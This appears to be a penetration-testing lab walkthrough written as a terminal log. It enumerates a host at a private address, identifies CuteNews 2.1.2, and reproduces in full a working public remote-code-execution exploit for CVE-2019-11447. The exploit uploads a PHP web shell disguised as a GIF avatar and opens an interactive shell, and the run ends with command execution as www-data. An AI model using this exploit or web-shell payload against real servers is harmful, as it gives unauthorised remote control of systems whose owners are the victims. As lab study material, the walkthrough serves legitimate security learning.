

└─$ nmap -p- 172.16.33.9 --reason --open
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 22:35 HKT
Nmap scan report for 172.16.33.9 (172.16.33.9)
Host is up, received syn-ack (0.035s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT    STATE SERVICE      REASON
22/tcp  open  ssh          syn-ack
80/tcp  open  http         syn-ack
88/tcp  open  kerberos-sec syn-ack
110/tcp open  pop3         syn-ack
995/tcp open  pop3s        syn-ack


└─$ nmap -sV -A 172.16.33.9                                                                               
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 22:38 HKT
Nmap scan report for 172.16.33.9 (172.16.33.9)
Host is up (0.042s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA)
|   256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA)
|_  256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519)
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
88/tcp  open  http     nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: 404 Not Found
110/tcp open  pop3     Courier pop3d
|_pop3-capabilities: TOP LOGIN-DELAY(10) STLS USER IMPLEMENTATION(Courier Mail Server) UTF8(USER) UIDL PIPELINING
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after:  2021-09-17T16:28:06
995/tcp open  ssl/pop3 Courier pop3d
|_pop3-capabilities: TOP LOGIN-DELAY(10) UTF8(USER) USER IMPLEMENTATION(Courier Mail Server) UIDL PIPELINING
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after:  2021-09-17T16:28:06
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


└─$ dirsearch -u 172.16.33.9  
Target: http://172.16.33.9/

[22:41:49] Starting:                                                                                      
[22:41:52] 403 -  276B  - /.ht_wsr.txt                                      
[22:41:52] 403 -  276B  - /.htaccess.bak1                                   
[22:41:52] 403 -  276B  - /.htaccess.orig                                   
[22:41:52] 403 -  276B  - /.htaccess.sample
[22:41:52] 403 -  276B  - /.htaccess.save
[22:41:52] 403 -  276B  - /.htaccess_extra                                  
[22:41:52] 403 -  276B  - /.htaccess_orig
[22:41:52] 403 -  276B  - /.htaccess_sc
[22:41:52] 403 -  276B  - /.htaccessBAK
[22:41:52] 403 -  276B  - /.htaccessOLD2
[22:41:52] 403 -  276B  - /.htaccessOLD
[22:41:52] 403 -  276B  - /.htm                                             
[22:41:52] 403 -  276B  - /.html
[22:41:52] 403 -  276B  - /.htpasswd_test                                   
[22:41:52] 403 -  276B  - /.htpasswds
[22:41:52] 403 -  276B  - /.httr-oauth                                      
[22:41:53] 403 -  276B  - /.php                                             
[22:42:05] 301 -  309B  - /core  ->  http://172.16.33.9/core/               
[22:42:06] 200 -    0B  - /docs/                                                                                        
[22:42:06] 301 -  309B  - /docs  ->  http://172.16.33.9/docs/                                                           
[22:42:07] 200 -    3KB - /example.php                                                                                  
[22:42:07] 200 -    1KB - /favicon.ico                                                                                  
[22:42:10] 200 -    2KB - /index.php                                                                                    
[22:42:10] 200 -    2KB - /index.php/login/                                                                             
[22:42:11] 200 -    1KB - /LICENSE.txt                                                                                  
[22:42:11] 301 -  309B  - /libs  ->  http://172.16.33.9/libs/               
[22:42:13] 200 -  201B  - /manual/index.html                                
[22:42:13] 301 -  311B  - /manual  ->  http://172.16.33.9/manual/           
[22:42:18] 200 -   28B  - /print.php                                        
[22:42:19] 200 -    2KB - /README.md                                        
[22:42:20] 200 -  118B  - /rss.php                                          
[22:42:20] 200 -  745B  - /search.php                                       
[22:42:20] 403 -  276B  - /server-status/                                   
[22:42:20] 403 -  276B  - /server-status                                    
[22:42:22] 301 -  310B  - /skins  ->  http://172.16.33.9/skins/             
[22:42:25] 200 -    0B  - /uploads/                                         
[22:42:25] 301 -  312B  - /uploads  ->  http://172.16.33.9/uploads/  

#after check of all available directions and pages, the only useful info is in the /index.php page
got the development framework or software, "" CuteNews 2.1.2

# check any exploits of this version of the CuteNews using searchsploit

└─$ searchsploit CuteNews  
CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)                         | php/remote/46698.rb
CuteNews 2.1.2 - Arbitrary File Deletion                                             | php/webapps/48447.txt
CuteNews 2.1.2 - Authenticated Arbitrary File Upload                                 | php/webapps/48458.txt
CuteNews 2.1.2 - Remote Code Execution                                               | php/webapps/48800.py

# only 48800.py seems to be a good try.
└─$ searchsploit -m 48800.py
# After read the code of the script, which is write by python3
└─$ python3 48800.py
 

           _____     __      _  __                     ___   ___  ___
          / ___/_ __/ /____ / |/ /__ _    _____       |_  | <  / |_  |
         / /__/ // / __/ -_)    / -_) |/|/ (_-<      / __/_ / / / __/
         \___/\_,_/\__/\__/_/|_/\__/|__,__/___/     /____(_)_(_)____/
                                ___  _________
                               / _ \/ ___/ __/
                              / , _/ /__/ _/
                             /_/|_|\___/___/




[->] Usage python3 expoit.py

Enter the URL> http://172.16.33.9
================================================================
Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN
================================================================
[-] No hashes were found skipping!!!
================================================================

=============================
Registering a users
=============================

#not get a shell as the file description showed

#try to modify the script
└─$ nano 48800.py                                                                                                                                 
# Exploit Title: CuteNews 2.1.2 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-10
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://cutephp.com/cutenews/downloading.php
# Software Link: https://cutephp.com/cutenews/downloading.php
# Version: CuteNews 2.1.2
# Tested on: Ubuntu 20.04, CuteNews 2.1.2
# CVE : CVE-2019-11447

#! /bin/env python3

import requests
from base64 import b64decode
import io
import re
import string
import random
import sys


banner = """


           _____     __      _  __                     ___   ___  ___
          / ___/_ __/ /____ / |/ /__ _    _____       |_  | <  / |_  |
         / /__/ // / __/ -_)    / -_) |/|/ (_-<      / __/_ / / / __/
         \___/\_,_/\__/\__/_/|_/\__/|__,__/___/     /____(_)_(_)____/
                                ___  _________
                               / _ \/ ___/ __/
                              / , _/ /__/ _/
                             /_/|_|\___/___/



"""
print (banner)
print ("[->] Usage python3 expoit.py")
print ()
sess = requests.session()
payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>"
ip = input("Enter the URL> ")
def extract_credentials():
    global sess, ip
#    url = f"{ip}/CuteNews/cdata/users/lines"
    url = f"{ip}/cdata/users/lines"
    encoded_creds = sess.get(url).text
    buff = io.StringIO(encoded_creds)
    chash = buff.readlines()
    if "Not Found" in encoded_creds:
            print ("[-] No hashes were found skipping!!!")
            return
    else:
        for line in chash:
            if "<?php die('Direct call - access denied'); ?>" not in line:
                credentials = b64decode(line)
                try:
                    sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)
                    print (sha_hash)
                except:
                    pass
def register():
    global sess, ip
    userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10))
    postdata = {
        "action" : "register",
        "regusername" : userpass,
        "regnickname" : userpass,
        "regpassword" : userpass,
        "confirm" : userpass,
        "regemail" : f"{userpass}@hack.me"
    }
#    register = sess.post(f"{ip}/CuteNews/index.php?register", data = postdata, allow_redirects = False)
    register = sess.post(f"{ip}/index.php?register", data = postdata, allow_redirects = False)
    if 302 == register.status_code:
        print (f"[+] Registration successful with username: {userpass} and password: {userpass}")
    else:
        sys.exit()
def send_payload(payload):
    global ip
#    token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text
    token = sess.get(f"{ip}/index.php?mod=main&opt=personal").text
    signature_key = re.search('signature_key" value="(.*?)"', token).group(1)
    signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1)
    logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)
    print (f"signature_key: {signature_key}")
    print (f"signature_dsi: {signature_dsi}")
    print (f"logged in user: {logged_user}")

    files = {
        "mod" : (None, "main"),
        "opt" : (None, "personal"),
        "__signature_key" : (None, f"{signature_key}"),
        "__signature_dsi" : (None, f"{signature_dsi}"),
        "editpassword" : (None, ""),
        "confirmpassword" : (None, ""),
        "editnickname" : (None, logged_user),
        "avatar_file" : (f"{logged_user}.php", payload),
        "more[site]" : (None, ""),
        "more[about]" : (None, "")
    }
#    payload_send = sess.post(f"{ip}/CuteNews/index.php", files = files).text
    payload_send = sess.post(f"{ip}/index.php", files = files).text
    print("============================\nDropping to a SHELL\n============================")
    while True:
        print ()
        command = input("command > ")
        postdata = {"cmd" : command}
#        output = sess.post(f"{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)
        output = sess.post(f"{ip}/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)

        if 404 == output.status_code:
            print ("sorry i can't find your webshell try running the exploit again")
            sys.exit()
        else:
            output = re.sub("GIF8;", "", output.text)
            print (output.strip())

if __name__ == "__main__":
    print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================")
    extract_credentials()
    print ("================================================================")
    print()
    print ("=============================\nRegistering a users\n=============================")
    register()
    print()
    print("=======================================================\nSending Payload\n=======================================================")
    send_payload(payload)
    print ()


#then run the script again.
└─$ python3 ./48800.py                                                                                                                           



           _____     __      _  __                     ___   ___  ___
          / ___/_ __/ /____ / |/ /__ _    _____       |_  | <  / |_  |
         / /__/ // / __/ -_)    / -_) |/|/ (_-<      / __/_ / / / __/
         \___/\_,_/\__/\__/_/|_/\__/|__,__/___/     /____(_)_(_)____/
                                ___  _________
                               / _ \/ ___/ __/
                              / , _/ /__/ _/
                             /_/|_|\___/___/




[->] Usage python3 expoit.py

Enter the URL> http://172.16.33.9
================================================================
Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN
================================================================
[-] No hashes were found skipping!!!
================================================================

=============================
Registering a users
=============================
[+] Registration successful with username: SDnxpy1yqh and password: SDnxpy1yqh

=======================================================
Sending Payload
=======================================================
signature_key: e6882bd3043e6623cb7be2c9356f04c2-SDnxpy1yqh
signature_dsi: d7807e48ae9910de8df6b6d5e3082068
logged in user: SDnxpy1yqh
============================
Dropping to a SHELL
============================

command > id

uid=33(www-data) gid=33(www-data) groups=33(www-data)


